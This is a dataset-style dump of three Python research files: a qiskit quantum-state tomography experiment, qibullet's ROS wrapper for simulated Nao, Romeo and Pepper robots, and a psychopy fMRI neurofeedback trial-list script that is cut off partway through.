source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
compare_Walltoall_qng.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_walltoall(num_layers, num_qubits):
n_walltoall = qtm.ansatz.calculate_n_walltoall(num_qubits)
thetas = np.ones(num_layers* 3 * num_qubits + num_layers*n_walltoall)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi)
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
G = qtm.fubini_study.qng(qc.copy(), thetas, qtm.ansatz.create_Walltoall_layerd_state, num_layers)
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Walltoall_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/loss_values_qng.csv",
loss_values,
delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/thetass_qng.csv",
thetass,
delimiter=",")
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Walltoall_layerd_state(
qc, thetas, num_layers=num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) +
' qubits')
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/traces_qng.csv",
traces,
delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) +
"/" + str(num_qubits) + "/fidelities_qng.csv",
fidelities,
delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1, 2, 3, 4, 5]
num_qubits = [2, 6]
t_walltoalls = []
for i in num_layers:
for j in num_qubits:
t_walltoalls.append(
multiprocessing.Process(target=run_walltoall, args=(i, j)))
for t_walltoall in t_walltoalls:
t_walltoall.start()
for t_walltoall in t_walltoalls:
t_walltoall.join()
print("Done!")
|
ros_wrapper.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
try:
import rospy
import roslib
import roslaunch
import tf2_ros
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from sensor_msgs.msg import JointState
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
from std_msgs.msg import Empty
from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
from naoqi_bridge_msgs.msg import PoseStampedWithSpeed
from geometry_msgs.msg import TransformStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
MISSING_IMPORT = None
except ImportError as e:
MISSING_IMPORT = str(e)
TOP_OPTICAL_FRAME = "CameraTop_optical_frame"
BOTTOM_OPTICAL_FRAME = "CameraBottom_optical_frame"
DEPTH_OPTICAL_FRAME = "CameraDepth_optical_frame"
class RosWrapper:
"""
Virtual class defining the basis of a robot ROS wrapper
"""
def __init__(self):
"""
Constructor
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.spin_thread = None
self._wrapper_termination = False
self.image_bridge = CvBridge()
self.front_info_msg = dict()
self.bottom_info_msg = dict()
self.depth_info_msg = dict()
self.roslauncher = None
self.transform_broadcaster = tf2_ros.TransformBroadcaster()
atexit.register(self.stopWrapper)
def stopWrapper(self):
"""
Stops the ROS wrapper
"""
self._wrapper_termination = True
try:
assert self.spin_thread is not None
assert isinstance(self.spin_thread, Thread)
assert self.spin_thread.isAlive()
self.spin_thread.join()
except AssertionError:
pass
if self.roslauncher is not None:
self.roslauncher.stop()
print("Stopping roslauncher")
def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
"""
Launches the ROS wrapper
Parameters:
virtual_robot - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.virtual_robot = virtual_robot
self.ros_namespace = ros_namespace
self.frequency = frequency
rospy.init_node(
"qibullet_wrapper",
anonymous=True,
disable_signals=False)
# Upload the robot description to the ros parameter server
try:
if isinstance(self.virtual_robot, PepperVirtual):
robot_name = "pepper"
elif isinstance(self.virtual_robot, NaoVirtual):
robot_name = "nao"
elif isinstance(self.virtual_robot, RomeoVirtual):
robot_name = "romeo"
else:
raise pybullet.error(
"Unknown robot type, wont set robot description")
package_path = roslib.packages.get_pkg_dir("naoqi_driver")
urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"
with open(urdf_path, 'r') as file:
robot_description = file.read()
rospy.set_param("/robot_description", robot_description)
except IOError as e:
raise pybullet.error(
"Could not retrieve robot descrition: " + str(e))
# Launch the robot state publisher
robot_state_publisher = roslaunch.core.Node(
"robot_state_publisher",
"robot_state_publisher")
self.roslauncher = roslaunch.scriptapi.ROSLaunch()
self.roslauncher.start()
self.roslauncher.launch(robot_state_publisher)
# Initialize the ROS publisher and subscribers
self._initPublishers()
self._initSubscribers()
# Launch the wrapper's main loop
self._wrapper_termination = False
self.spin_thread = Thread(target=self._spin)
self.spin_thread.start()
def _initPublishers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS publishers
"""
raise NotImplementedError
def _initSubscribers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS subscribers
"""
raise NotImplementedError
def _spin(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Designed to emulate a ROS spin method
"""
raise NotImplementedError
def _broadcastOdometry(self, odometry_publisher):
"""
INTERNAL METHOD, computes an odometry message based on the robot's
position, and broadcast it
Parameters:
odometry_publisher - The ROS publisher for the odometry message
"""
# Send Transform odom
x, y, theta = self.virtual_robot.getPosition()
odom_trans = TransformStamped()
odom_trans.header.frame_id = "odom"
odom_trans.child_frame_id = "base_link"
odom_trans.header.stamp = rospy.get_rostime()
odom_trans.transform.translation.x = x
odom_trans.transform.translation.y = y
odom_trans.transform.translation.z = 0
quaternion = pybullet.getQuaternionFromEuler([0, 0, theta])
odom_trans.transform.rotation.x = quaternion[0]
odom_trans.transform.rotation.y = quaternion[1]
odom_trans.transform.rotation.z = quaternion[2]
odom_trans.transform.rotation.w = quaternion[3]
self.transform_broadcaster.sendTransform(odom_trans)
# Set up the odometry
odom = Odometry()
odom.header.stamp = rospy.get_rostime()
odom.header.frame_id = "odom"
odom.pose.pose.position.x = x
odom.pose.pose.position.y = y
odom.pose.pose.position.z = 0.0
odom.pose.pose.orientation = odom_trans.transform.rotation
odom.child_frame_id = "base_link"
[vx, vy, vz], [wx, wy, wz] = pybullet.getBaseVelocity(
self.virtual_robot.getRobotModel(),
self.virtual_robot.getPhysicsClientId())
odom.twist.twist.linear.x = vx
odom.twist.twist.linear.y = vy
odom.twist.twist.angular.z = wz
odometry_publisher.publish(odom)
def _broadcastCamera(self, image_publisher, info_publisher):
"""
INTERNAL METHOD, computes the image message and the info message of the
active camera and publishes them into the ROS framework
Parameters:
image_publisher: The ROS publisher for the Image message,
corresponding to the image delivered by the active camera
info_publisher: The ROS publisher for the CameraInfo message,
corresponding to the parameters of the active camera
"""
try:
camera = self.virtual_robot.getActiveCamera()
assert camera is not None
assert camera.getFrame() is not None
camera_image_msg = self.image_bridge.cv2_to_imgmsg(
camera.getFrame())
camera_image_msg.header.frame_id = camera.getCameraLink().getName()
# Fill the camera info message
camera_info_msg = CameraInfo()
camera_info_msg.distortion_model = "plumb_bob"
camera_info_msg.header.frame_id = camera.getCameraLink().getName()
camera_info_msg.width = camera.getResolution().width
camera_info_msg.height = camera.getResolution().height
camera_info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
camera_info_msg.K = camera._getCameraIntrinsics()
camera_info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
camera_info_msg.P = list(camera_info_msg.K)
camera_info_msg.P.insert(3, 0.0)
camera_info_msg.P.insert(7, 0.0)
camera_info_msg.P.append(0.0)
# Check if the retrieved image is RGB or a depth image
if isinstance(camera, CameraDepth):
camera_image_msg.encoding = "16UC1"
else:
camera_image_msg.encoding = "bgr8"
# Publish the image and the camera info
image_publisher.publish(camera_image_msg)
info_publisher.publish(camera_info_msg)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints
extra_joints - A dict, describing extra joints to be published. The
dict should respect the following syntax:
{"joint_name": joint_value, ...}
"""
msg_joint_state = JointState()
msg_joint_state.header = Header()
msg_joint_state.header.stamp = rospy.get_rostime()
msg_joint_state.name = list(self.virtual_robot.joint_dict)
msg_joint_state.position = self.virtual_robot.getAnglesPosition(
msg_joint_state.name)
try:
assert isinstance(extra_joints, dict)
for name, value in extra_joints.items():
msg_joint_state.name += [name]
msg_joint_state.position += [value]
except AssertionError:
pass
joint_state_publisher.publish(msg_joint_state)
def _jointAnglesCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/joint_angles topic
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::PoseStampedWithSpeed. That type can be found in
the ros naoqi software stack
"""
joint_list = msg.joint_names
position_list = list(msg.joint_angles)
if len(msg.speeds) != 0:
velocity = list(msg.speeds)
else:
velocity = msg.speed
self.virtual_robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Nao, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_nao instance
Parameters:
virtual_nao - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_nao,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == NaoVirtual.ID_CAMERA_TOP:
RosWrapper._broadcastCamera(
self,
self.front_cam_pub,
self.front_info_pub)
elif camera.getCameraId() == NaoVirtual.ID_CAMERA_BOTTOM:
RosWrapper._broadcastCamera(
self,
self.bottom_cam_pub,
self.bottom_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Romeo, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_romeo instance
Parameters:
virtual_romeo - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_romeo,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.right_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/image_raw',
Image,
queue_size=10)
self.right_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/camera_info',
CameraInfo,
queue_size=10)
self.left_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/image_raw',
Image,
queue_size=10)
self.left_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == RomeoVirtual.ID_CAMERA_RIGHT:
RosWrapper._broadcastCamera(
self,
self.right_cam_pub,
self.right_info_pub)
elif camera.getCameraId() == RomeoVirtual.ID_CAMERA_LEFT:
RosWrapper._broadcastCamera(
self,
self.left_cam_pub,
self.left_info_pub)
elif camera.getCameraId() == RomeoVirtual.ID_CAMERA_DEPTH:
RosWrapper._broadcastCamera(
self,
self.depth_cam_pub,
self.depth_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Pepper, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_pepper instance
Parameters:
virtual_pepper - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_pepper,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.laser_pub = rospy.Publisher(
self.ros_namespace + "/laser",
LaserScan,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
rospy.Subscriber(
'/cmd_vel',
Twist,
self._velocityCallback)
rospy.Subscriber(
'/move_base_simple/goal',
PoseStampedWithSpeed,
self._moveToCallback)
rospy.Subscriber(
'/move_base_simple/cancel',
Empty,
self._killMoveCallback)
def _broadcastLasers(self, laser_publisher):
"""
INTERNAL METHOD, publishes the laser values in the ROS framework
Parameters:
laser_publisher - The ROS publisher for the LaserScan message,
corresponding to the laser info of the pepper robot (for API
consistency)
"""
if not self.virtual_robot.laser_manager.isActive():
return
scan = LaserScan()
scan.header.stamp = rospy.get_rostime()
scan.header.frame_id = "base_footprint"
# -120 degres, 120 degres
scan.angle_min = -2.0944
scan.angle_max = 2.0944
# 240 degres FoV, 61 points (blind zones inc)
scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)
# Detection ranges for the lasers in meters, 0.1 to 3.0 meters
scan.range_min = 0.1
scan.range_max = 3.0
# Fill the lasers information
right_scan = self.virtual_robot.getRightLaserValue()
front_scan = self.virtual_robot.getFrontLaserValue()
left_scan = self.virtual_robot.getLeftLaserValue()
if isinstance(right_scan, list):
scan.ranges.extend(list(reversed(right_scan)))
scan.ranges.extend([-1]*8)
if isinstance(front_scan, list):
scan.ranges.extend(list(reversed(front_scan)))
scan.ranges.extend([-1]*8)
if isinstance(left_scan, list):
scan.ranges.extend(list(reversed(left_scan)))
laser_publisher.publish(scan)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
camera = self.virtual_robot.getActiveCamera()
try:
assert camera is not None
if camera.getCameraId() == PepperVirtual.ID_CAMERA_TOP:
RosWrapper._broadcastCamera(
self,
self.front_cam_pub,
self.front_info_pub)
elif camera.getCameraId() == PepperVirtual.ID_CAMERA_BOTTOM:
RosWrapper._broadcastCamera(
self,
self.bottom_cam_pub,
self.bottom_info_pub)
elif camera.getCameraId() == PepperVirtual.ID_CAMERA_DEPTH:
RosWrapper._broadcastCamera(
self,
self.depth_cam_pub,
self.depth_info_pub)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(
self,
joint_state_publisher,
extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})
def _velocityCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/cmd_vel topic
Parameters:
msg - a ROS message containing a Twist command
"""
self.virtual_robot.move(msg.linear.x, msg.linear.y, msg.angular.z)
def _moveToCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/goal' topic. It allows to move the robot's base
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::PoseStampedWithSpeed. That type can be found in
the ros naoqi software stack
"""
x = msg.pose_stamped.pose.position.x
y = msg.pose_stamped.pose.position.y
theta = pybullet.getEulerFromQuaternion([
msg.pose_stamped.pose.orientation.x,
msg.pose_stamped.pose.orientation.y,
msg.pose_stamped.pose.orientation.z,
msg.pose_stamped.pose.orientation.w])[-1]
speed = msg.speed_percentage *\
PepperBaseController.MAX_LINEAR_VELOCITY +\
PepperBaseController.MIN_LINEAR_VELOCITY
frame = msg.referenceFrame
self.virtual_robot.moveTo(
x,
y,
theta,
frame=frame,
speed=speed,
_async=True)
def _killMoveCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/cancel' topic. This callback is used to stop the
robot's base from moving
Parameters:
msg - an empty ROS message, with the Empty type
"""
self.virtual_robot.moveTo(0, 0, 0, _async=True)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastLasers(self.laser_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
|
morphingMovies.py
|
# This code should be run in console room computer to display the feedback morphings
from __future__ import print_function, division
import os
if 'watts' in os.getcwd():
main_dir = "/home/watts/Desktop/ntblab/kailong/rtSynth_rt/"
else:
main_dir="/Users/kailong/Desktop/rtEnv/rtSynth_rt/"
import sys
sys.path.append(main_dir)
sys.path.append(main_dir+"expScripts/feedback/")
from psychopy import visual, event, core, logging, gui, data, monitors
from psychopy.hardware.emulator import launchScan, SyncGenerator
from PIL import Image
import string
import fmrisim as sim
import numpy as np
import pandas as pd
import pylink
from tqdm import tqdm
import time
import re
import logging
import threading
import argparse
alpha = string.ascii_uppercase
from rtCommon.subjectInterface import SubjectInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
from rtCommon.cfg_loading import mkdir,cfg_loading
class SubjectService:
def __init__(self, args, webSocketChannelName='wsSubject'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of
SubjectInterface to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
webSocketChannelName: The websocket url extension used to connecy and communicate
to the remote projectServer, 'wsSubject' will connect to 'ws://server:port/wsSubject'
"""
self.subjectInterface = SubjectInterface(subjectRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(SubjectInterface, self.subjectInterface)
def runDetached(self):
"""Starts the receiver in it's own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
self.recvThread.setDaemon(True)
self.recvThread.start()
argParser = argparse.ArgumentParser()
argParser.add_argument('-c', '--config', action="store", dest="config", default='sub001.ses2.toml', type=str, help='experiment file (.json or .toml)')
argParser.add_argument('-r', '--run', action="store", dest="run", default='1', type=str, help='current run')
# argParser.add_argument('-e', '--sess', action="store", dest="sess", default='1', type=str, help='current session')
argParser.add_argument('-s', action="store", dest="server", default="localhost:7777",
help="Server Address with Port [server:port]")
argParser.add_argument('-i', action="store", dest="interval", type=int, default=5,
help="Retry connection interval (seconds)")
argParser.add_argument('-u', '--username', action="store", dest="username", default='kp578',
help="rtcloud website username")
argParser.add_argument('-p', '--password', action="store", dest="password", default='kp578',
help="rtcloud website password")
argParser.add_argument('--test', default=False, action='store_true',
help='Use unsecure non-encrypted connection')
argParser.add_argument('--trying', default=False, action='store_true',
help='Use unsecure non-encrypted connection')
args = argParser.parse_args("")
args.trying=True
if args.trying:
scanmode = 'Test' # 'Scan' or 'Test' or None
screenmode = False # fullscr True or False
monitor_name = "testMonitor" #"testMonitor"
prange=20
else:
scanmode = 'Scan' # 'Scan' or 'Test' or None
screenmode = True # fullscr True or False
monitor_name = "scanner"
prange=20
if not re.match(r'.*:\d+', args.server):
print("Error: Expecting server address in the form <servername:port>")
argParser.print_help()
sys.exit()
# Check if the ssl certificate is valid for this server address
from rtCommon.projectUtils import login, certFile, checkSSLCertAltName, makeSSLCertFile
addr, _ = args.server.split(':')
if checkSSLCertAltName(certFile, addr) is False:
# Addr not listed in sslCert, recreate ssl Cert
makeSSLCertFile(addr)
cfg = cfg_loading(args.config)
sub = cfg.subjectName
run = int(args.run) # 1
sess = int(cfg.session)
cfg.feedback_expScripts_dir = f"{cfg.projectDir}expScripts/feedback/"
gui = True if screenmode == False else False
scnWidth, scnHeight = monitors.Monitor(monitor_name).getSizePix()
frameTolerance = 0.001 # how close to onset before 'same' frame
TRduration=int(cfg.TR)
# mywin = visual.Window(
# size=[1280, 800], fullscr=screenmode, screen=0,
# winType='pyglet', allowGUI=False, allowStencil=False,
# monitor=monitor_name, color=[0,0,0], colorSpace='rgb', #color=[0,0,0]
# blendMode='avg', useFBO=True,
# units='height')
mywin = visual.Window(
size=[scnWidth - 100, scnHeight - 100], fullscr=screenmode, screen=1,
winType='pyglet', allowGUI=False, allowStencil=False,
monitor=monitor_name, color=[0,0,0], colorSpace='rgb', #color=[0,0,0]
blendMode='avg', useFBO=True,
units='height')
# similation specific
step=3 #in simulation, how quickly the morph changes ramp up. Note this is only for simulation, has nothing to do with real experiment
# trial_list designing parameters
parameterRange=np.arange(1,prange) #for saving time for now. np.arange(1,20) #define the range for possible parameters for preloading images. Preloading images is to make the morphing smooth during feedback
tune=4 # this parameter controls how much to morph (how strong the morphing is) (used in preloading function), tune can range from (1,6.15] when paremeterrange is np.arange(1,20)
TrialNumber=180 # how many trials are required #test trial ,each trial is 14s, 10 trials are 140s.
## - design the trial list: the sequence of the different types of components:
## - e.g: ITI + waiting for fMRI signal + feedback (receive model output from feedbackReceiver.py)
trial_list = pd.DataFrame(columns=['Trial','time','TR','state','newWobble'])
curTime=0
curTR=0
state=''
trial_list.append({'Trial':None,
'time':None,
'TR':None,
'state':None,
'newWobble':None},
ignore_index=True)
for currTrial in range(1,1+TrialNumber):
# ITI
for i in range(6): # should be 6TR=12s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'ITI',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# waiting for metric calculation
for i in range(3): # should be 3TR=6s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'waiting',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# feedback trial: try minimize the whobbling
for i in range(5): #5TR=10s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'feedback',
'newWobble':1},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# end ITI
for i in range(6): # should be 6TR=12s
trial_list=trial_list.append({'Trial':currTrial,
'time':curTime,
'TR':curTR,
'state':'ITI',
'newWobble':0},
ignore_index=True)
curTime=curTime+TRduration
curTR=curTR+1
# parameters = np.arange(1,step*(sum((trial_list['newWobble']==1)*1)),step) #[1,2,3,4,5,6,7,8]
print('total trial number=',TrialNumber)
# print('neighboring morph difference=',tune)
print('preloaded parameter range=',parameterRange)
# print('used parameters=',parameters)
def sample(L,num=10):
# This functional uniformly sample the list to be num points
# e.g, if L is 0-99, num is 10, newList would be [9, 19, 29, 39, 49, 59, 69, 79, 89, 99]
# e.g, if L is 0-95, num is 10, newList would be [8, 18, 27, 37, 47, 56, 66, 75, 85, 95]
# e.g, if L is 0-5, num is 10, newList would be [0, 0, 0, 1, 2, 2, 3, 3, 4, 5]
sampleStep=len(L)/num
newList=[]
for i in range(1,num):
newList.append(L[int(i*sampleStep-1)])
newList.append(L[-1])
return newList
# preload image list for parameter from 1 to 19.
# def preloadimages(parameterRange=np.arange(1,20),tune=1):
# '''
# purpose:
# preload images into image object sequences corrresponding too each parameter
# each parameter corresponds to 40 image objects
# steps:
# 重新说明一下image 的命名方式:
# [benchBed/bedChair/bedTable/] _ [1-99] _ [5-39] .png
# [AD/AB/AC] _ [morphing degree] _ [angle to watch] .png
# {"A": "bed", "B": "Chair", "C": "table", "D": "bench"}
# '''
# tune=tune-1 #当前tune=4
# #当前tune=3
# start = time.time()
# imageLists={}
# numberOfUpdates=16 # corresponds to 66 updates A - 15 + C1 + 15 + 1 + 15 + 1
# # A 10 C 10 A 10 D 10 A
# last_image=''
# for currParameter in tqdm(parameterRange):
# images=[]
# print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
# for axis in ['bedTable', 'benchBed']:
# tmp_images=[]
# for currImg in range(1, int(round(tune*currParameter*numberOfUpdates+2)), int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
